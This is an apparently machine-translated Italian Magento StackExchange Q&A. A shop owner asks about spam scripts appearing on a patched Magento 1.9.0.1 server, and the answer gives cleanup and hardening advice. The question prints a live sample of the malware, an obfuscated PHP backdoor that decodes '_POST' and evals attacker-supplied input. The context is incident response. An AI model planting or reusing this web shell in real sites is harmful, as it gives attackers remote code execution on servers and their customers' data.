"Pulire" magento installazione 1.9.0.1 (Patch installate) Script spam installati?

magento.stackexchange https://magento.stackexchange.com/questions/108031

Domanda

Ho un paio di webshop magenti.E solo un webshop magento senza estensioni e con tutte le patch installate ha il problema che installa alcuni script che inviano spam.

Alcuni fatti:

    .
  • magento 1.9.0.1
  • Nessuna estensione
  • Tema verificato che ottiene aggiornamenti regolari
  • Tema infantile utilizzato per le proprie personalizzazioni (solo CSS e Simple HTML)
  • Patch tutto installato quando necessario

È installato su un VPS su Centos.PHP-FPM 5.3 (5.6 come secondo PHP) Exim + mailgun utilizzato per l'invio di posta.

Un campione di ciò che è installato: 

<?php
$ugjr9="utrsoe_p";
$kzbf99 =$ugjr9[3]. $ugjr9[1]. $ugjr9[2]. $ugjr9[1]. $ugjr9[4]. $ugjr9[0]. $ugjr9[7]. $ugjr9[7]. $ugjr9[5]. $ugjr9[2];
$dmr4 = $kzbf99($ugjr9[6]. $ugjr9[7] . $ugjr9[4]. $ugjr9[3]. $ugjr9[1] );
if( isset (${$dmr4 }['qa04af1'])) {eval( ${ $dmr4 }['qa04af1' ]) ; }
?>
.

Aiuto Aiuto

È stato utile?

Soluzione

Se possibile, prova a identificare la causa principale del problema (con cui il malware sei infetto. È noto magento?).

Consiglierei di verificare che tutti i tuoi file core nell'installazione Magento siano stati modificati o verificare o controllare qualsiasi script nel server che potrebbe causare il problema.

https://blog.amasty. COM / FREEBIE-MAGENTO-Modified-Core-Files-Report-by-Amasty /

Poiché non si utilizza alcuna estensione è possibile sostituire tutti i file core con una nuova installazione per essere sicuri.

Dai un'occhiata ai seguenti suggerimenti.

https:// www .linkedin.com / Pulse / 20141210024646-1143212-22-ways-to-bulletproof-your-magento-Security

.
    .
  • Crea un percorso di amministratore personalizzato
  • Scegli un nome utente e una password di amministratore lungo e complessa ( https://strongpasswordgenerator.com/ ) Non usare mai la tua password di amministrazione magenta per qualsiasi altra cosa
  • Utilizzare sempre FTP sicuro
  • Limita l'accesso FTP non garantito per prevenire cattivi script da distruggere il cavo
  • Cambia i tuoi autorizzazioni del file
  • Lockdown Your Magento Connect Manager
Autorizzato sotto: CC-BY-SA insieme a attribuzione
Non affiliato a magento.stackexchange
scroll top